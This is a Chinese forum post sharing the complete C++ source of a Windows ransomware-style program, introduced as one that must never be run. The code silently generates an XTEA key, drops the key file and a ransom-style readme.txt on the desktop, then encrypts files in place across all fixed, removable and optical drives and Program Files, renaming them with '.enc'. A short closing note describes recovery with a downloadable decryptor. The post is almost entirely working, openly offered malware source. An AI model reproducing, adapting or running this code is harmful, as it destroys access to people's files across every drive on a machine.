请勿点击
2026-01-18 10:20:26
发布于:上海
5阅读
0回复
0点赞
千万不能运行的程序:
// 第一步:最开头定义XP兼容宏,防重复定义
#ifndef _WIN32_IE
#define _WIN32_IE 0x0501
#endif
#ifndef WINVER
#define WINVER 0x0501
#endif
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <windows.h>
#include <cctype>
#include <process.h>
#include <shlobj.h>
// 适配Dev-C++ 4.9.2 TDM:补充uint32_t类型定义
#ifndef UINT32_MAX
typedef unsigned int uint32_t;
#define UINT32_MAX 0xFFFFFFFF
#endif
// 配置常量(适配XP系统)
#define BUFFER_SIZE 4096 * 16
#define MAX_PATH_LEN 260
#define MAX_DRIVE_COUNT 26
#define MAX_THREAD_COUNT 32
// XTEA加密配置
#define XTEA_KEY_SIZE 4
#define XTEA_ROUNDS 32
#define XTEA_BLOCK_SIZE 8
// 全局常量(后缀、不加密的文件名)
const char g_enc_suffix[] = ".enc";
const char g_dll_suffix[] = ".dll";
const char g_sys_suffix[] = ".sys";
const char g_protect_file1[] = "adfdsfysdi.sadhuyaw"; // 第一个不加密文件
const char g_protect_file2[] = "readme.txt"; // 第二个不加密文件(说明文件)
const size_t g_enc_suffix_len = sizeof(g_enc_suffix) - 1;
const size_t g_dll_suffix_len = sizeof(g_dll_suffix) - 1;
const size_t g_sys_suffix_len = sizeof(g_sys_suffix) - 1;
const size_t g_protect_file1_len = sizeof(g_protect_file1) - 1;
const size_t g_protect_file2_len = sizeof(g_protect_file2) - 1;
// 全局XTEA密钥(仅驻留内存,最终存入保护文件)
uint32_t g_xtea_key[XTEA_KEY_SIZE] = {0};
// C盘特殊保护目录
const char g_prog_files[] = "C:\\Program Files\\";
const char g_prog_files_x86[] = "C:\\Program Files (x86)\\";
const size_t g_prog_files_len = sizeof(g_prog_files) - 1;
const size_t g_prog_files_x86_len = sizeof(g_prog_files_x86) - 1;
// 线程数据结构体
typedef struct {
char target_path[MAX_PATH_LEN];
bool is_c_special_dir;
} ThreadData, *PThreadData;
// ==================== 函数原型声明 ====================
inline int has_suffix(const char* filename, const char* suffix, size_t suffix_len);
inline void get_file_directory(const char* filepath, char* dir, size_t dir_size);
inline void get_file_name(const char* filepath, char* filename, size_t filename_size);
void get_current_user_desktop_path(char* desktop_path, size_t path_size);
void generate_random_xtea_key();
void create_protect_files_on_desktop();
int process_file_encrypt(const char* file_path);
int get_available_drives(char drives[][MAX_PATH_LEN], int max_drives);
void scan_directory_encrypt(const char* dir);
unsigned int __stdcall EncryptThreadProc(void* lpParameter);
inline void uint32_to_string(uint32_t value, char* buffer, size_t buffer_size);
inline int is_protect_file(const char* filepath);
// ==================== 内联工具函数(无任何控制台输出) ====================
inline void print_fatal_error() {
// 无任何提示,直接退出程序
ExitProcess(EXIT_FAILURE);
}
inline void int_to_string(long long value, char* buffer, size_t buffer_size) {
_snprintf(buffer, buffer_size, "%lld", value);
}
inline void uint32_to_string(uint32_t value, char* buffer, size_t buffer_size) {
_snprintf(buffer, buffer_size, "%08X", value); // 8位十六进制格式,便于存储
}
inline void get_file_directory(const char* filepath, char* dir, size_t dir_size) {
const char* last_slash = strrchr(filepath, '\\');
if (!last_slash || dir_size == 0) {
dir[0] = '\0';
return;
}
size_t len = last_slash - filepath + 1;
len = (len >= dir_size) ? (dir_size - 1) : len;
strncpy(dir, filepath, len);
dir[len] = '\0';
}
inline void get_file_name(const char* filepath, char* filename, size_t filename_size) {
const char* last_slash = strrchr(filepath, '\\');
if (filename_size == 0) return;
if (!last_slash) {
strncpy(filename, filepath, filename_size - 1);
} else {
strncpy(filename, last_slash + 1, filename_size - 1);
}
filename[filename_size - 1] = '\0';
}
// 重命名文件(添加.enc后缀,无日志输出)
inline int rename_file_with_suffix(const char* original_path, int is_encrypt) {
if (!original_path || original_path[0] == '\0') return 0;
char new_path[MAX_PATH_LEN] = {0};
char file_dir[MAX_PATH_LEN] = {0};
char file_name[MAX_PATH_LEN] = {0};
get_file_directory(original_path, file_dir, MAX_PATH_LEN);
get_file_name(original_path, file_name, MAX_PATH_LEN);
if (is_encrypt) {
snprintf(new_path, MAX_PATH_LEN, "%s%s%s", file_dir, file_name, g_enc_suffix);
} else {
if (!has_suffix(file_name, g_enc_suffix, g_enc_suffix_len)) return 0;
char* suffix_pos = strrchr(file_name, '.');
if (suffix_pos) *suffix_pos = '\0';
snprintf(new_path, MAX_PATH_LEN, "%s%s", file_dir, file_name);
}
if (!MoveFileA(original_path, new_path)) {
return 0;
}
return 1;
}
// 排除目录判断
inline int is_excluded_directory(const char* full_path, bool& is_c_special) {
is_c_special = false;
if (!full_path || full_path[0] == '\0') return 1;
const char c_windows[] = "C:\\Windows\\";
const char c_recycle_bin[] = "C:\\$Recycle.Bin\\";
const size_t windows_len = sizeof(c_windows) - 1;
const size_t recycle_len = sizeof(c_recycle_bin) - 1;
const size_t full_path_len = strlen(full_path);
// 标记C盘特殊目录
if (full_path_len >= g_prog_files_len && _strnicmp(full_path, g_prog_files, g_prog_files_len) == 0) {
is_c_special = true;
return 0;
}
if (full_path_len >= g_prog_files_x86_len && _strnicmp(full_path, g_prog_files_x86, g_prog_files_x86_len) == 0) {
is_c_special = true;
return 0;
}
// 排除系统核心目录
if (full_path_len >= windows_len && _strnicmp(full_path, c_windows, windows_len) == 0) {
return 1;
}
if (full_path_len >= recycle_len && _strnicmp(full_path, c_recycle_bin, recycle_len) == 0) {
return 1;
}
return 0;
}
// 后缀匹配判断
inline int has_suffix(const char* filename, const char* suffix, size_t suffix_len) {
if (!filename || !suffix || filename[0] == '\0' || suffix_len == 0) return 0;
const size_t filename_len = strlen(filename);
if (filename_len < suffix_len) return 0;
return _strnicmp(filename + filename_len - suffix_len, suffix, suffix_len) == 0;
}
// 判断是否是需要保护的文件(adfdsfysdi.sadhuyaw / readme.txt)
inline int is_protect_file(const char* filepath) {
if (!filepath || filepath[0] == '\0') return 0;
char filename[MAX_PATH_LEN] = {0};
get_file_name(filepath, filename, MAX_PATH_LEN);
// 不区分大小写匹配两个保护文件
if (_strnicmp(filename, g_protect_file1, g_protect_file1_len) == 0) {
return 1;
}
if (_strnicmp(filename, g_protect_file2, g_protect_file2_len) == 0) {
return 1;
}
return 0;
}
// XTEA核心加密函数
inline void xtea_encrypt_block(uint32_t* v, const uint32_t* k) {
uint32_t v0 = v[0], v1 = v[1];
uint32_t sum = 0;
const uint32_t delta = 0x9E3779B9;
for (int i = 0; i < XTEA_ROUNDS; i++) {
v0 += (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + k[sum & 3]);
sum += delta;
v1 += (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + k[(sum >> 11) & 3]);
}
v[0] = v0;
v[1] = v1;
}
// XTEA缓冲区批量处理(仅加密,无解密逻辑)
inline void xtea_process_buffer(unsigned char* buffer, size_t bytes_process) {
if (!buffer || bytes_process == 0) return;
size_t full_blocks = bytes_process / XTEA_BLOCK_SIZE;
for (size_t i = 0; i < full_blocks; i++) {
uint32_t* block = (uint32_t*)(buffer + i * XTEA_BLOCK_SIZE);
xtea_encrypt_block(block, g_xtea_key);
}
size_t remaining_bytes = bytes_process % XTEA_BLOCK_SIZE;
if (remaining_bytes > 0) {
unsigned char padding_block[XTEA_BLOCK_SIZE] = {0};
size_t offset = full_blocks * XTEA_BLOCK_SIZE;
memcpy(padding_block, buffer + offset, remaining_bytes);
uint32_t* pad_block_ptr = (uint32_t*)padding_block;
xtea_encrypt_block(pad_block_ptr, g_xtea_key);
memcpy(buffer + offset, padding_block, remaining_bytes);
}
}
inline void process_binary_data(unsigned char* original_data, size_t data_len) {
xtea_process_buffer(original_data, data_len);
}
// 生成随机XTEA密钥(无任何控制台输出,仅填充全局密钥数组)
void generate_random_xtea_key() {
HCRYPTPROV hProv = 0;
if (!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) {
print_fatal_error();
}
if (!CryptGenRandom(hProv, sizeof(g_xtea_key), (BYTE*)g_xtea_key)) {
CryptReleaseContext(hProv, 0);
print_fatal_error();
}
CryptReleaseContext(hProv, 0);
// 验证密钥非全0(无日志,直接退出)
int is_all_zero = 1;
for (int i = 0; i < XTEA_KEY_SIZE; i++) {
if (g_xtea_key[i] != 0) {
is_all_zero = 0;
break;
}
}
if (is_all_zero) {
print_fatal_error();
}
}
// 获取当前用户桌面路径(无日志,XP兼容)
void get_current_user_desktop_path(char* desktop_path, size_t path_size) {
if (!desktop_path || path_size == 0) return;
// XP原生支持SHGetFolderPathA
HRESULT hr = SHGetFolderPathA(NULL, CSIDL_DESKTOP, NULL, SHGFP_TYPE_CURRENT, desktop_path);
if (FAILED(hr) || desktop_path[0] == '\0') {
// 备用方案:拼接用户目录
char user_profile[MAX_PATH_LEN] = {0};
GetEnvironmentVariableA("USERPROFILE", user_profile, sizeof(user_profile));
snprintf(desktop_path, path_size, "%s\\Desktop", user_profile);
}
// 确保路径以反斜杠结尾
size_t path_len = strlen(desktop_path);
if (path_len > 0 && desktop_path[path_len - 1] != '\\' && path_len + 1 < path_size) {
desktop_path[path_len] = '\\';
desktop_path[path_len + 1] = '\0';
}
}
// 新增:在桌面创建两个保护文件(adfdsfysdi.sadhuyaw+readme.txt)
void create_protect_files_on_desktop() {
char desktop_path[MAX_PATH_LEN] = {0};
get_current_user_desktop_path(desktop_path, sizeof(desktop_path));
// 1. 创建adfdsfysdi.sadhuyaw(空文件,存入密钥)
char file1_path[MAX_PATH_LEN] = {0};
snprintf(file1_path, sizeof(file1_path), "%s%s", desktop_path, g_protect_file1);
HANDLE hFile1 = CreateFileA(
file1_path,
GENERIC_WRITE,
FILE_SHARE_READ,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hFile1 != INVALID_HANDLE_VALUE) {
// 写入32位十六进制密钥(仅密钥,无其他内容)
char key_str[33] = {0};
for (int i = 0; i < XTEA_KEY_SIZE; i++) {
char uint32_str[9] = {0};
uint32_to_string(g_xtea_key[i], uint32_str, sizeof(uint32_str));
strcat(key_str, uint32_str);
}
DWORD bytes_written;
WriteFile(hFile1, key_str, strlen(key_str), &bytes_written, NULL);
FlushFileBuffers(hFile1);
CloseHandle(hFile1);
}
// 2. 创建readme.txt(写入加密算法说明)
char file2_path[MAX_PATH_LEN] = {0};
snprintf(file2_path, sizeof(file2_path), "%s%s", desktop_path, g_protect_file2);
HANDLE hFile2 = CreateFileA(
file2_path,
GENERIC_WRITE,
FILE_SHARE_READ,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hFile2 != INVALID_HANDLE_VALUE) {
// 写入加密算法说明文字
const char readme_content[] = "Your files on your computer have been encrypted by me.\n\nHow?\n\nWe used the encryption solution to encrypt your files and you can't be access to your files.";
DWORD bytes_written;
WriteFile(hFile2, readme_content, strlen(readme_content), &bytes_written, NULL);
FlushFileBuffers(hFile2);
CloseHandle(hFile2);
}
}
// Win32 API 文件处理(加密,不加密保护文件,无日志)
int process_file_encrypt(const char* file_path) {
// 1. 跳过保护文件(adfdsfysdi.sadhuyaw / readme.txt)
if (is_protect_file(file_path)) {
return 0;
}
// 2. 跳过已加密/系统文件
bool is_c_special = false;
if (is_excluded_directory(file_path, is_c_special)) {
return 0;
}
char file_name[MAX_PATH_LEN] = {0};
get_file_name(file_path, file_name, MAX_PATH_LEN);
if (has_suffix(file_name, g_enc_suffix, g_enc_suffix_len) ||
has_suffix(file_name, g_dll_suffix, g_dll_suffix_len) ||
has_suffix(file_name, g_sys_suffix, g_sys_suffix_len)) {
return 0;
}
// 3. 打开文件(读写模式)
HANDLE hFile = CreateFileA(
file_path,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN,
NULL
);
if (hFile == INVALID_HANDLE_VALUE) {
return 0;
}
// 4. 加密数据并覆盖原文件
unsigned char buffer[BUFFER_SIZE];
DWORD bytes_read;
DWORD bytes_written;
int process_success = 1;
while (ReadFile(hFile, buffer, sizeof(buffer), &bytes_read, NULL) && bytes_read > 0) {
// 加密数据
process_binary_data(buffer, bytes_read);
// 回退文件指针
LARGE_INTEGER liDistanceToMove;
liDistanceToMove.QuadPart = -((LONGLONG)bytes_read);
if (!SetFilePointerEx(hFile, liDistanceToMove, NULL, FILE_CURRENT)) {
process_success = 0;
break;
}
// 写入加密后数据
if (!WriteFile(hFile, buffer, bytes_read, &bytes_written, NULL) || bytes_written != bytes_read) {
process_success = 0;
break;
}
// 刷新缓冲区
if (!FlushFileBuffers(hFile)) {
process_success = 0;
break;
}
}
// 5. 关闭文件句柄
CloseHandle(hFile);
if (!process_success) {
return 0;
}
// 6. 重命名添加.enc后缀
rename_file_with_suffix(file_path, 1);
return 1;
}
// 获取所有可用磁盘(无日志)
int get_available_drives(char drives[][MAX_PATH_LEN], int max_drives) {
DWORD drive_mask = GetLogicalDrives();
int drive_count = 0;
if (drive_mask == 0) {
print_fatal_error();
return 0;
}
for (char c = 'A'; c <= 'Z' && drive_count < max_drives; c++) {
if (drive_mask & 1) {
char drive[MAX_PATH_LEN] = {0};
snprintf(drive, sizeof(drive), "%c:\\", c);
UINT drive_type = GetDriveTypeA(drive);
if (drive_type == DRIVE_FIXED || drive_type == DRIVE_REMOVABLE || drive_type == DRIVE_CDROM) {
strncpy(drives[drive_count], drive, MAX_PATH_LEN - 1);
drives[drive_count][MAX_PATH_LEN - 1] = '\0';
drive_count++;
}
}
drive_mask >>= 1;
}
return drive_count;
}
// 递归扫描目录(加密,无日志)
void scan_directory_encrypt(const char* dir) {
if (!dir || dir[0] == '\0') return;
bool is_c_special = false;
if (is_excluded_directory(dir, is_c_special) && !is_c_special) return;
char search_path[MAX_PATH_LEN] = {0};
snprintf(search_path, sizeof(search_path), "%s*.*", dir);
WIN32_FIND_DATAA find_data;
HANDLE hFind = FindFirstFileA(search_path, &find_data);
if (hFind == INVALID_HANDLE_VALUE) return;
do {
if (strcmp(find_data.cFileName, ".") == 0 || strcmp(find_data.cFileName, "..") == 0) continue;
char full_path[MAX_PATH_LEN] = {0};
snprintf(full_path, sizeof(full_path), "%s%s", dir, find_data.cFileName);
if (find_data.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
char sub_dir[MAX_PATH_LEN] = {0};
snprintf(sub_dir, sizeof(sub_dir), "%s\\", full_path);
scan_directory_encrypt(sub_dir);
} else {
process_file_encrypt(full_path);
}
} while (FindNextFileA(hFind, &find_data));
FindClose(hFind);
}
// 线程处理函数(加密,无日志)
unsigned int __stdcall EncryptThreadProc(void* lpParameter) {
PThreadData pData = (PThreadData)lpParameter;
if (!pData) return 1;
scan_directory_encrypt(pData->target_path);
free(pData);
return 0;
}
// 链接必要Win32库
#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "kernel32.lib")
#pragma comment(lib, "shell32.lib")
// ==================== WinMain入口(Windows应用程序,无控制台) ====================
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
// 1. 生成随机XTEA密钥(静默)
generate_random_xtea_key();
// 2. 在桌面创建两个保护文件(adfdsfysdi.sadhuyaw + readme.txt)
create_protect_files_on_desktop();
// 3. 获取所有可用磁盘(静默)
char available_drives[MAX_DRIVE_COUNT][MAX_PATH_LEN] = {0};
int drive_count = get_available_drives(available_drives, MAX_DRIVE_COUNT);
if (drive_count == 0) {
print_fatal_error();
}
// 4. 初始化线程(静默)
HANDLE hThreads[MAX_THREAD_COUNT] = {0};
int thread_count = 0;
// 4.1 处理C盘特殊目录
PThreadData pProgFiles = (PThreadData)malloc(sizeof(ThreadData));
if (pProgFiles) {
strncpy(pProgFiles->target_path, g_prog_files, MAX_PATH_LEN - 1);
pProgFiles->target_path[MAX_PATH_LEN - 1] = '\0';
pProgFiles->is_c_special_dir = true;
hThreads[thread_count] = (HANDLE)_beginthreadex(NULL, 0, EncryptThreadProc, pProgFiles, 0, NULL);
if (hThreads[thread_count] != INVALID_HANDLE_VALUE) thread_count++;
else free(pProgFiles);
}
PThreadData pProgFilesX86 = (PThreadData)malloc(sizeof(ThreadData));
if (pProgFilesX86) {
strncpy(pProgFilesX86->target_path, g_prog_files_x86, MAX_PATH_LEN - 1);
pProgFilesX86->target_path[MAX_PATH_LEN - 1] = '\0';
pProgFilesX86->is_c_special_dir = true;
hThreads[thread_count] = (HANDLE)_beginthreadex(NULL, 0, EncryptThreadProc, pProgFilesX86, 0, NULL);
if (hThreads[thread_count] != INVALID_HANDLE_VALUE) thread_count++;
else free(pProgFilesX86);
}
// 4.2 处理所有可用磁盘
for (int i = 0; i < drive_count && thread_count < MAX_THREAD_COUNT; i++) {
PThreadData pThreadData = (PThreadData)malloc(sizeof(ThreadData));
if (!pThreadData) continue;
strncpy(pThreadData->target_path, available_drives[i], MAX_PATH_LEN - 1);
pThreadData->target_path[MAX_PATH_LEN - 1] = '\0';
pThreadData->is_c_special_dir = false;
hThreads[thread_count] = (HANDLE)_beginthreadex(NULL, 0, EncryptThreadProc, pThreadData, 0, NULL);
if (hThreads[thread_count] != INVALID_HANDLE_VALUE) thread_count++;
else free(pThreadData);
}
// 5. 等待所有线程完成(静默)
if (thread_count > 0) {
WaitForMultipleObjects(thread_count, hThreads, TRUE, INFINITE);
for (int i = 0; i < thread_count; i++) {
CloseHandle(hThreads[i]);
}
}
// 6. 静默退出程序,无任何输出
ExitProcess(EXIT_SUCCESS);
}
解密方法:
桌面会有一个很奇怪的文件,后缀改成.txt,打开,复制里面的内容
下载解毒程序
打开解读程序,输入复制的内容,等待即可
这里空空如也
有帮助,赞一个